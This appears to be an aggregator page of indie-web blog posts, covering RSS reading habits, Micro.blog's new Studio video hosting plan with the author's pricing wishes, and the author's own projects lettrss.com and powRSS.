of the main reasons I want to start blogging about my other creative hobbies a bit more. She also has one of the prettiest blog designs I have ever seen! Everything I know about web sustainability, I have probably learned directly from Fershad Irani's blog . Eric Bailey writes the kind of posts that I send to every single person I know in the industry as soon as I see them hit my feed. Robert Kingett 's website tagline is 'A fabulously blind romance author', what's not to love? Robert has written numerous pieces that have completely reshaped how I feel about certain topics. His writing style is persuasive with a heaped tablespoon of humor for good measure. The final two folks don't post that regularly, but they are my friends so I am allowed to nudge them in the hope it will make them post more often. Jan Maarten and Katherine Yang have blogs that are so unapologetically them. More posts, please!

0 views
pabloecortez 2 weeks ago

You can read the web seasonally

What if you read things around the web the way you watch movies or listen to music? A couple of days ago I made a post on Mastodon introducing lettrss.com, a project I made that takes a book in the public domain and sends one chapter a day to your RSS reader. Xinit replied with a great point about RSS feed management: This is fascinating, but I know how it would go based on the thousands of unread RSS feeds I've had, and the thousands of unheard podcasts I subscribed to. I'd end up with an RSS of unread chapters, representing a whole book in short order. Regardless of my inability to deal, it remains a great idea, and I will absolutely recommend while hiding my shame of a non-zero inbox. When I first started using RSS, I thought I'd found this great tool for keeping tabs on news, current events, and stuff I should and do care about. After adding newspapers, blogs, magazines, publications, YouTube channels and release notes from software I use, I felt a false sense of accomplishment, like I'd finally been able to wrangle the craziness of the internet into a single app, like I had rebelled against the algorithm™️. But it didn't take long to accumulate hundreds of posts, most of which I had no true desire to read, and soon after I abandoned my RSS reader. I came back to check on it from time to time, but its dreadful little indicator of unread posts felt like a personal failure, so eventually I deleted it entirely. Will Hopkins wrote a great post on this exact feeling. I don't actually like to read later : I used Instapaper back in the day, quite heavily. I built up a massive backlog of items that I'd read occasionally on my OG iPod Touch. At some point, I fell off the wagon, and Instapaper fell by the wayside. [...] The same thing has happened with todo apps over the years, and feed readers. They become graveyards of good intentions and self-imposed obligations. Each item is a snapshot in time of my aspirations for myself, but they don't comport to the reality of who I am. I couldn't have said it better myself. This only happens with long-form writing, whenever I come across an essay or blog post that I know will either require my full attention or a bit more time than I'm willing to give it in the moment. I've never had that issue with music. Music is more discrete. It's got a timestamp. I listen to music through moods and seasons, so much so that I make a playlist for every month of the year like a musical scrapbook. What if we took this approach to RSS feeds? Here's what I replied to Xinit: This is something I find myself struggling with too. I think I'm okay knowing some RSS feeds are seasonal, same as music genres throughout the year. Some days I want rock, others I want jazz. Similarly with RSS feeds, I've become comfortable archiving and resurfacing feeds. For reference, I follow around 10 feeds at any given time, and the feeds I follow on my phone are different from the ones on my desktop. You shouldn't feel guilty about removing feeds from your RSS readers. It's not a personal failure, it's an allocation of resources like time and attention.

0 views
HeyDingus 2 weeks ago

Micro.blog offers an indie alternative to YouTube with its ‘Studio’ video hosting plan

The core of Micro.blog’s mission is to make it easy for people to own their presence on the web. At first, it was a simple blog host that also incorporated a Twitter-like social timeline that put short (title-less) and long (titled) posts on equal footing. In the years since its 2017 launch, Manton Reece — Micro.blog’s founder — has added a plethora of features that expand upon that mission. Here’s a list off the top of my head: All of this is hosted on your own website, (optionally, but strongly encouraged) at your own domain name. I’ve never seen anything else like it. There are plans ranging from $1/month to $15/month that include subsets of these features, depending on how much a blogging “ power user” you are. Reece’s next 1 big foray with Micro.blog: video hosting, which launched yesterday . Micro.blog Studio adds longer video hosting for your blog, with uploads up to 20 minutes. You can read  some of the technical bits here . It can automatically copy videos to PeerTube and Bluesky too. That’s a quaint description for what promises to be a significant challenge. 2 Because if hosting videos were easy, YouTube wouldn’t be the only 3 game in town. And that’s exactly why Reece has pursued it . It’s not good for the open web for so much of its video content to live centralized at one host. John Gruber lamented this following Jimmy Kimmel’s suspension: The big problem is YouTube. With YouTube, Google has a centralized chokehold on video. We need a way that’s as easy and scalable to host video content, independently, as it is for written content. I don’t know what the answer to that is, technically, but we ought to start working on it with urgency. Just like Micro.blog encourages people to own their text, reading lists, podcasts, photos, and social network interactions at their own domain, that ethos now extends to videos too. One of the great things about Micro.blog is how it enables the Publish to Own Site, Syndicate Elsewhere ( POSSE ) framework. That’s manifested in features like its automatic crossposting to Bluesky, Flickr, LinkedIn, Mastodon, Medium, Nostr, Pixelfed, Threads, and Tumblr. And manual crossposting elsewhere. This allows the “ source of truth” to be at your own website that you control, but you won’t miss out on conversations and audiences in other places. With expanded video hosting, Reece has added PeerTube as another automatic crossposting destination, and hopes to also enable YouTube if and when Google approves his application. It’s not about only posting to your website, but instead centralizing your website as the first and primary place you post and then getting your text, images, audio, and now video out to other networks from there. As you can probably tell, I’m pretty excited about Micro.blog taking on the challenge of being that ’ indie-focused, YouTube alternative” that Reece envisioned . I haven’t upgraded my plan yet, but only because I mainly post shorter videos (covered by my current ‘ Premium’ plan), but I’m very glad it now exists as an option. There’s never been a better time to own your spot on the web. If you haven’t checked out Micro.blog before, I think it’s a compelling place to look. Update 2025-11-11: I was in a hurry when I posted this earlier, and it slipped my mind to include some wants and wishes that I have for Micro.blog’s video hosting capabilities. It’s a short list, due to both Reece’s solid offering from the outset, and my lack of imagination. 😆 Scale time limits across the tiers. I really think video hosting would be a stronger offering if it were available more consistently across Micro.blog’s tiers. For example, 1-minute videos at $5/month, 5-minute videos at $10/month, 10-minute videos at $15/month, and 20-minute videos at $20/month. All with the same capabilities, but limited by length. This was something that I know Reece considered, but ultimately decided against in the name of simplicity. He didn’t want to muck up the existing plans, and (rightly) considers them a tremendous value with their current features. He obviously hopes that people will upgrade to the higher-priced Studio plan specifically for the new video stuff. But I think tying some video features (multiple resolutions and fast playback on your blog) to the 20-minute time limit and $20 plan creates more confusion, a feature gap, and missed opportunity. Take me for example. I think I could reasonably say that I’m a Micro.blog power user. But even I’m not sure if I’m correct in saying that those unique features are limited to the Studio plan. I know everyone gets video uploads up to 1 minute in length. (Maybe not everyone, though. Does Micro.one users at $1/month get the “ new” video features? I’m not sure. Historically, most of the videos I post are around 90 seconds in length. I’m far more likely to shave 30 seconds off my videos to fit a 1-minute time limit than I am to double my monthly cost to show those extra 30 seconds. There’s too big a gap between 1-minute videos and 20-minute videos to make it seem worthwhile. In my mind, I’d be “ wasting” the extra $10/month ($120/year) by not posting 20-minute videos. But I’d be more likely to pay a little extra money for a little extra time. And then if I started hitting that new limit, I’d feel incentivized and validated graduating up to the next tier. I worry that Reece will see more infrastructure cost with a bunch of 1-minute videos being uploaded and served, but won’t see an accompanying bump in revenue, since we’re all getting the 1-minute videos for “ free, and I don’t see a significant portion of Micro.blog users needing the 20-minutes. Said one more way, I think giving people a little headroom to grow into hosting their videos on Micro.blog will make them more likely to upgrade over time. Once that habit has solidified, and users are comfortable with it, paying $5 more for the next jump in time limit isn’t a big ask. But jumping right into the Studio plan for $10-$15 extra is kind of off-putting. The gap between 1 minute and 20 is just too big. Support 4K resolution. A pie-in-the-sky request, I know. 4K videos are huge. But I can nearly always see the difference, and choose higher quality playback every time. I’d love for my videos to appear at full-quality if they’re uploaded that way. To be clear, Micro.blog has had the ability to host videos — or nearly any other kind of file upload — and show them on your blog for years. But it’s been limited by file size, not an optimized part of the offering. The Studio tier makes it a first-rate feature, with smooth playback, automatic conversion to multiple resolutions, and ups the limit to a healthy 20 minutes no matter the file size. And the old file size-limited video uploads should still work for folks who rely on that workflow. 👌 ↩︎ Here’s a little more on the what and the why from Reece. ↩︎ Sure, Vimeo exists, but it’s expensive and limited, and it’s future is uncertain . Plus, you’re still posting to a domain. And, of course, many people post videos to Instagram, Facebook, TikTok, X, and other social networks. But I’d argue that videos there serve the algorithm first and users second. Micro.blog’s Studio tier flips that. It’s meant to serve the user first, and there is no algorithm at all. ↩︎ HeyDingus is a blog by Jarrod Blundy about technology, the great outdoors, and other musings. If you like what you see — the blog posts , shortcuts , wallpapers , scripts , or anything — please consider leaving a tip , checking out my store , or just sharing my work. Your support is much appreciated! I’m always happy to hear from you on social , or by good ol' email . Hosting podcasts Bookmarking/archiving webpages Fediverse compatibility with native replies to Mastodon and novel reply gathering from Bluesky Crossposting to other social networks Photo blogging Custom domain name registration Private notes Book/Movie/TV Show blogging Reading tracking Automatic newsletters Open APIs to manage your content To be clear, Micro.blog has had the ability to host videos — or nearly any other kind of file upload — and show them on your blog for years. But it’s been limited by file size, not an optimized part of the offering. The Studio tier makes it a first-rate feature, with smooth playback, automatic conversion to multiple resolutions, and ups the limit to a healthy 20 minutes no matter the file size. And the old file size-limited video uploads should still work for folks who rely on that workflow. 👌 ↩︎ Here’s a little more on the what and the why from Reece. ↩︎ Sure, Vimeo exists, but it’s expensive and limited, and it’s future is uncertain . Plus, you’re still posting to a domain. And, of course, many people post videos to Instagram, Facebook, TikTok, X, and other social networks. But I’d argue that videos there serve the algorithm first and users second. Micro.blog’s Studio tier flips that. It’s meant to serve the user first, and there is no algorithm at all. ↩︎

0 views
pabloecortez 2 weeks ago

Read a book via RSS with lettrss.com

If you picked a book and sent one chapter a day to my RSS reader, I'm sure I'd read it all. I'll be putting this to the test with lettrss.com , a project I built to syndicate books in the public domain via RSS. lettrss - read public domain books via RSS Since the second part of the Wicked movie is coming out on November 21 in the United States, I thought it’d be fun to start this RSS project with The Wonderful Wizard of Oz by L. Frank Baum.

0 views
pabloecortez 3 weeks ago

How I discover new (and old) blogs and websites

One of the great things about having a blog is that you get a space that is entirely yours, where you share whatever you want and you make it look exactly how you want it to look. It's a labor of creativity and self-expression. An encouraging aspect of having a blog is also being read by others. I love receiving emails from people who liked a post. It's just nice to know I'm not shouting into the void! But take for instance posts I wrote last year or many years ago. How do those get discovered? Perhaps you wrote an awesome essay on your favorite topic back in 2022. How can I or anyone else stumble upon your work? Making it easy to discover hidden gems from the indie web was my motivation for making powRSS . powRSS is a public RSS feed aggregator to help you find the side of the internet that seldom appears on corporate search engines. It surfaces posts and blogs going all the way back to 1995. You never know what you're going to find and I think it's really fun. Today I made a video showing how it works.

3 views